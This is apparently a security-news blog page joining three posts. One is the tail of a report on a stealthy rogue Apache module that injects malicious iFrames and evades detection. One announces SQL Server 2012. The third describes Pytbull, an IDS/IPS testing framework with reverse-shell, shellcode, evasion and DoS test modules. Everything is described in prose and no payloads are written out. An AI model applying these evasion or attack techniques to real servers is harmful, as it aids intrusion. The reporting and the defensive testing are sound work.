Interestingly, the module doesn't attempt to infect every Web page it serves. In fact, it includes a number of anti-detection capabilities, including watching for signs of administrator access or processes and avoids serving malware to search engines. Furthermore, when it does serve a Web page infected with links to malicious websites, the module then temporarily blacklists the user's IP address to avoid delivering multiple, infected Web pages, which might make its activities easier to detect. It then queries a command and control server to provide a new iFrame tag, further hampering detection.

As a result, "this is a complex and potentially difficult threat to detect accurately," said Mullaney. "As the rogue module contains a number of evasion techniques, it is possible that a system administrator would not notice the infection for some time. A further difficulty in detecting the threat is the on-the-fly nature of the infection. Since no Web pages are infected on the disk, no detections on stored HTML pages are possible."

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Apache Web Server Under Stealth Attack"https://www.voiceofgreyhat.com/2011/05/apache-web-server-under-stealth-attack.html</a>

Microsoft®SQL Server 2012 Released & Available To Download

Microsoft®SQL Server 2012 Released & Available To Download 

The software giant Microsoft announced the availability of SQL Server 2012. The product will be generally available on April 1st but you can still download the evaluation version on today itself. The Big Data features in SQL Server 2012 include new storage options and tools that help with analysis of large workloads. For example, the new version includes an in-memory column-oriented database to improve analytics performance. In addition, Microsoft is developing a Windows-based version of Hadoop (the Hortonworks edition) for the Azure cloud environment which should be ready for prime time by July 1. 

Key Features:-

•     AlwaysOn Availability Groups

•     Support for Server Core

•     Power View

•     SQL Server Data Tools

•     Data Quality Services

•     Hadoop Integration

While there been a lot of exciting changes to the product there’s also been changes to the editions and licensing. SQL Server 2012 will provide the Enterprise, Business Intelligence, Standard and Express editions. Notably the older Datacenter and Workgroup editions have been dropped. A new core based licensing scheme has been added as well. 

To Download Microsoft®SQL Server 2012 Evaluation Click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Microsoft®SQL Server 2012 Released & Available To Download"https://www.voiceofgreyhat.com/2012/03/microsoftsql-server-2012-released.html</a>

Pytbull: An IDS/IPS Testing Framework

Pytbull is an Intrusion Detection/Prevention System (IDS/IPS)testing framework for Snort and Suricata. We all know the greatness of these two projects. Even though it concentrates on Snort and Suricata, it can possibly be used to test the detection and blocking capabilities of other IDS/IPS also. You can also use it to compare IDS/IPS, or compare their configuration modifications or to simply check/validate configurations. The framework is well equipped with about 300 tests grouped in 8 testing modules, such as:

• clientSideAttacks: This module uses a reverse shell to provide the server with instructions todownload remote malicious files. It tests the ability of the IDS/IPS to protect against client-side attacks.
• testRules: It is a basic rules testing module. These attacks are supposed to be detected by the rules sets shipped with the IDS/IPS.
• badTraffic: This module transmits non RFC compliant packets to the server to test how packets are processed and responded to.
• fragmentedPackets: This module transmits various fragmented payloads to a server to test its ability to recompose them and detect the attacks.
• multipleFailedLogins: This module tests the ability of the server to track multiple failed logins (e.g. FTP). It makes use of custom rules on Snort and Suricata.
• evasionTechniques: This module employs various evasion techniques to check if the IDS/IPS can detect them.
• shellCodes: This module transmits various shellcodes to the server on port 21/tcp to test the ability of the server to detect/reject shellcodes.
• denialOfService: This module transmits tests the ability of the IDS/IPS to protect against simple DoS attempts.

Pytbull is easily configurable and could integrate new modules in the future. After downloading you need to edit the config.cfg file that accompanies the tool. It basically contains path information about a few settings and other tools such as Nikto, HPING and Snort and Suricata alerts files. You can even prevent a few tests from running. How do you do that? Simply set 0 or 1 in the config.cfg file. As always, 0 means that the test will be ignored and 1 means that it will be added to the tests queue. Pytbull can run basically 5 types of tests:

• Socket: open a socket on a given port and send the payloads to the remote target on that port.
• Command: send command to the remote target with the subprocess.call() python function.
• Scapy: send special crafted payloads based on the Scapy syntax
• Multiple failed logins: open a socket on port 21/TCP (FTP) and attempt to login 5 times with bad credentials.
• Client side attacks: use a reverse shell on the remote target and send commands to it to make them processed by the server (typically wget commands).

Before running the tests, pytbull will cleverly perform a basic checks too. That’s not all, it also supports reporting! You can also have it report to a custom .html file. Its pre-requisites are:

• A Debian based Linux operating system.
• Python (2.6.5)
• A FTP server

Download Pytbull v0.3 (pytbull-0.3.tar.bz2) here.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Pytbull: An IDS/IPS Testing Framework"https://www.voiceofgreyhat.com/2011/05/pytbull-idsips-testing-framework.html</a>